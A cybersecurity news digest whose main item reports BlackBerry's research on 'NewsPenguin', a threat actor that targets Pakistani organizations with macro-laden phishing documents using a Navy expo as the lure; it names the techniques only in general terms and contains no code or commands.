At a glance.
- Pakistan's navy under cyberattack.
- New criminal threat-actor uses screenshots for recon.
- ESXiArgs: widespread, but effects still being assessed.
- Phishing campaign pursues Ukrainian and Polish targets.
Pakistan's navy under cyberattack.
Blackberry blogged today about a new threat actor they’ve called “NewsPenguin,” seen targeting Pakistani organizations. Using the upcoming Pakistani Navy’s International Maritime Expo & Conference as a phishing lure, the actor attaches a malicious document utilizing “a remote template injection technique and embedded malicious Visual Basic for Applications (VBA) macro code to deliver the next stage of the attack, which leads to the final payload execution,” say the researchers. The eventual payload contains an XOR-encrypted “penguin” encryption key, as well as the content-disposition response header name parameter set to “getlatestnews” during the HTTP response, both of which contributed to the name given to the actor by the researchers. “NewsPenguin is a previously unknown threat actor relying on unseen tooling to target Pakistani users and potential visitors of the Pakistani International Maritime Expo & Conference,” BlackBerry says. There’s no attribution so far, but BlackBerry thinks that NewsPenguin’s motivation is espionage, and not profit.